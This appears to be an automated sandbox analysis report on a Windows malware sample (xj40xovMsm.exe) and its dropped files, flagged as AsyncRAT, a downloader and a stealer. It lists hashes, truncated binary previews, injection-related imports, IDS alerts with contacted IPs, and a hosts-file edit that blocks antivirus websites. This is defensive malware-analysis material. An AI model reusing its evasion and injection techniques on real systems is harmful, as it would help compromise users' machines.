                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):225310
                                                                                                                                                                                                                                Entropy (8bit):6.053295654393721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
                                                                                                                                                                                                                                MD5:A4623D0552D87941FBEFBE7133262D15
                                                                                                                                                                                                                                SHA1:74080A949DA104FDAB34E2A9350B924E07C08C14
                                                                                                                                                                                                                                SHA-256:8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
                                                                                                                                                                                                                                SHA-512:4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):225310
                                                                                                                                                                                                                                Entropy (8bit):6.053295654393721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
                                                                                                                                                                                                                                MD5:A4623D0552D87941FBEFBE7133262D15
                                                                                                                                                                                                                                SHA1:74080A949DA104FDAB34E2A9350B924E07C08C14
                                                                                                                                                                                                                                SHA-256:8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
                                                                                                                                                                                                                                SHA-512:4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):48640
                                                                                                                                                                                                                                Entropy (8bit):5.555815017949639
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xuwpFTAY3IQWUe9jqmo2qLPYT87XPUpDKcMRPIXB140bxYEEggal46E4bIAnnMWu:xuwpFTA4/2lgXMMOXbzbxY9ggd6DbIAS
                                                                                                                                                                                                                                MD5:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                SHA1:FC92BE55DCE55098824E381EDEC2002287BB8042
                                                                                                                                                                                                                                SHA-256:D77EE327A52A472BC309A79DB27B82F133C2F7B4DDAE689CC130EBE407752FD3
                                                                                                                                                                                                                                SHA-512:7E92EE4B23E9ECFC97C259F7572DCB818CC6A77DBF02B693F58249926A8ED6C324B5CA641BA0C68DB0B063BF966C8651EB82DE9AA2B46446FEA238FA255F27D6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................N.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*VrN%.p~....(o....#...*.s...
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):238080
                                                                                                                                                                                                                                Entropy (8bit):5.990664364126582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
                                                                                                                                                                                                                                MD5:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                SHA1:067C1B809106A1B9AD1641A9C745D4B83ECE1196
                                                                                                                                                                                                                                SHA-256:91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
                                                                                                                                                                                                                                SHA-512:1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):238080
                                                                                                                                                                                                                                Entropy (8bit):5.990664364126582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
                                                                                                                                                                                                                                MD5:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                SHA1:067C1B809106A1B9AD1641A9C745D4B83ECE1196
                                                                                                                                                                                                                                SHA-256:91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
                                                                                                                                                                                                                                SHA-512:1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                Process:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1330
                                                                                                                                                                                                                                Entropy (8bit):4.711832601225753
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtU70cfC/fop+w+H+J+7y:vDZhyoZWM9rU5fFcNDTmkT
                                                                                                                                                                                                                                MD5:9B0756E93EDDEEC56435747A840F3F40
                                                                                                                                                                                                                                SHA1:2738B410009DD29E723FEA0D2C141BB023948EB2
                                                                                                                                                                                                                                SHA-256:81B6BEA3907109FA32EF9AB2664EC81174B334B8B125AEAD1952A1603A4CD413
                                                                                                                                                                                                                                SHA-512:59D417DC4EAC5F2D995DFEFFB21C0C2F29BE5A2229407B12C1CF5F315A7CC6685BF2C2ADFC6F5A1965540F9B85D883282BCD32F5AD76F84B504CFDE8C9E68EE8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 www.malwarebytes.com...0.0.0.0 en.malwarebytes.com...0.0.0.0 fr.malwarebytes.com...0.0.0.0 es.malwarebytes.com...0.0.0.0 www.avast.com...0.0.0.0 www.avg.com...0.0.0.0 w
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.41440934524794
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                                                                                                                                                MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                                                                                                                                                SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                                                                                                                                                SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                                                                                                                                                SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.9175376660436045
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win64 Executable GUI Net Framework (217006/5) 43.44%
                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 40.43%
                                                                                                                                                                                                                                • InstallShield setup (43055/19) 8.62%
                                                                                                                                                                                                                                • Win64 Executable (generic) Net Framework (21505/4) 4.30%
                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 2.40%
                                                                                                                                                                                                                                File name:xj40xovMsm.exe
                                                                                                                                                                                                                                File size:15'088'640 bytes
                                                                                                                                                                                                                                MD5:1082572a44d4c41214a3c38dcd8289f9
                                                                                                                                                                                                                                SHA1:d1e83fbdc0bfaa92334eb043e3f37bbe1104cd68
                                                                                                                                                                                                                                SHA256:9085e6327177bb47cf43a8d8ed0c24fcfd50cde4199c5130f2b97b2508e9aabc
                                                                                                                                                                                                                                SHA512:364bea1a64fa1b0248692ac6239a10f4a38d52a93dcc71502220804061a3c0a2e6d4e0dce45a563e372829998c9cf3a2f44a6c047ec830e9a26eef3510b014d2
                                                                                                                                                                                                                                SSDEEP:393216:iXMxStQvFIeTiQvMipcK5x00D1lR/ggb/Dt:oXU1TzvMInx0QV/D
                                                                                                                                                                                                                                TLSH:07E6335EFA608A93E99D4238FC21F3B70B753CF45A72D696F95079DE6D32201CD28212
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...U...T.&.....T.&.....T.D.....T..c....T..c....T..c....T..`....T..`....T.......T..`....T.Rich..T................
                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                Entrypoint:0x14000f0d8
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x6683160A [Mon Jul 1 20:48:10 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:1c99c85c193e659c86109d62f2b36c67
                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                call 00007FBA6D1D6BD0h
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                jmp 00007FBA6D1CF827h
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                mov eax, ecx
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                neg ecx
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                test eax, 00000007h
                                                                                                                                                                                                                                je 00007FBA6D1CF9C1h
                                                                                                                                                                                                                                nop
                                                                                                                                                                                                                                mov dl, byte ptr [eax]
                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                                test dl, dl
                                                                                                                                                                                                                                je 00007FBA6D1CFA11h
                                                                                                                                                                                                                                test al, 07h
                                                                                                                                                                                                                                jne 00007FBA6D1CF9A5h
                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                mov eax, FEFEFEFFh
                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                • [RES] VS2012 build 50727
                                                                                                                                                                                                                                • [LNK] VS2012 build 50727
                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x33ac40xc8.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x588.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3a0000x1e00.pdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d0000x704.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f3b00x70.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x260000x508.rdata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x10000x249fe0x24a00874ca7ad685328491f9fabeeba3b0477False0.5484681633959044zlib compressed data6.417629028323008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rdata0x260000xec100xee0069b037775cf70c2bed5f6bb83d8d9437False0.31895023634453784COM executable for DOS4.411128745473268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .data0x350000x4e800x2600695705f70e2858afb8a9c6ef91adedbfFalse0.23653371710526316data3.3127629656102306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .pdata0x3a0000x1e000x1e00b8fd82356bacb7ba5fe4683194ff124eFalse0.49609375data5.420593750389663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0x3c0000x5880x6001772f848c8df08f17aae9811a440341aFalse0.419921875data4.159643852819197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .reloc0x3d0000x1bf80x1c00ddc909fc27a64e99e4dd979a17a576f8False0.15457589285714285data2.06822605094356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_VERSION0x3c0a00x2c0dataEnglishUnited States0.4502840909090909
                                                                                                                                                                                                                                RT_MANIFEST0x3c3600x224XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (488), with CRLF line terminatorsEnglishUnited States0.531021897810219
                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                SHLWAPI.dllPathFindFileNameW
                                                                                                                                                                                                                                ADVAPI32.dllOpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCloseKey, RegSetValueExW, GetTokenInformation
                                                                                                                                                                                                                                USER32.dllwsprintfW, wsprintfA
                                                                                                                                                                                                                                ole32.dllCoInitialize, CoUninitialize, CoCreateInstance
                                                                                                                                                                                                                                OLEAUT32.dllVariantClear
                                                                                                                                                                                                                                ntdll.dllRtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, NtWriteFile, RtlPcToFileHeader, RtlInitUnicodeString, NtSetInformationFile, NtClose, NtOpenFile, NtCreateSection, RtlAdjustPrivilege, NtSetInformationProcess, RtlVirtualUnwind, NtMapViewOfSection
                                                                                                                                                                                                                                WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlW, HttpQueryInfoA, InternetOpenW
                                                                                                                                                                                                                                SHELL32.dllSHGetFolderPathW, SHGetFolderPathA
                                                                                                                                                                                                                                KERNEL32.dllLoadLibraryW, SetEndOfFile, InitializeCriticalSectionEx, WriteConsoleW, SetStdHandle, ReadConsoleW, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetLocaleInfoEx, OutputDebugStringW, HeapReAlloc, LoadLibraryExW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount64, QueryPerformanceCounter, GetModuleHandleW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStringTypeW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetFilePointerEx, ReadFile, GetStartupInfoW, InitOnceExecuteOnce, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetFileType, GetCurrentThreadId, SetLastError, GetThreadContext, SetThreadContext, Wow64SetThreadContext, WriteProcessMemory, Wow64GetThreadContext, GetCurrentProcess, Process32First, WaitForSingleObject, CreateRemoteThread, OpenProcess, GetProcAddress, VirtualAllocEx, Process32Next, GetModuleHandleA, CreateToolhelp32Snapshot, CloseHandle, CreateDirectoryW, CopyFileW, GetModuleFileNameW, GetLastError, SetFileAttributesW, VirtualProtectEx, GetFileSize, SetFilePointer, WriteFile, DuplicateHandle, CreateThread, LoadLibraryA, GetSystemDirectoryW, GetTempFileNameW, CreateFileW, GetTempPathW, ResumeThread, ExitProcess, FindFirstFileW, HeapAlloc, GetProcessHeap, GetWindowsDirectoryA, GetVolumeInformationA, Sleep, TerminateProcess, lstrcatA, CreateDirectoryA, CopyFileA, SetFileAttributesA, FindClose, Process32FirstW, GetModuleFileNameA, Process32NextW, CreateMutexA, FindNextFileW, LocalFree, MapViewOfFile, UnmapViewOfFile, VirtualFree, VirtualAlloc, CreateFileMappingA, ExpandEnvironmentStringsW, EncodePointer, DecodePointer, HeapFree, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, IsDebuggerPresent, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, GetCommandLineW, GetModuleHandleExW, MultiByteToWideChar, HeapSize, GetStdHandle, RaiseException, IsValidCodePage, GetACP, GetOEMCP
                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                EnglishUnited States
                                                                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                07/06/24-13:27:23.876923TCP2019714ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile4976280192.168.2.4192.3.140.185
                                                                                                                                                                                                                                07/06/24-13:28:20.702090TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:29:11.211434TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34994580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:29:05.900230TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34993680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:28:23.914512TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:27:27.885798TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:28:10.743030TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:27:53.289576TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34980480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:29:02.431241TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34992780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:27:24.902744TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                07/06/24-13:27:36.852023TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34978580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:29:20.361652TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34995480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:28:27.540890TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34985680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:28:28.461699TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34986080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:29:21.262339TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34995580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:27:32.251129TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                07/06/24-13:28:21.524237TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:28:51.211391TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34990980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                07/06/24-13:27:16.324762TCP2054071ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M34974280192.168.2.464.31.40.18
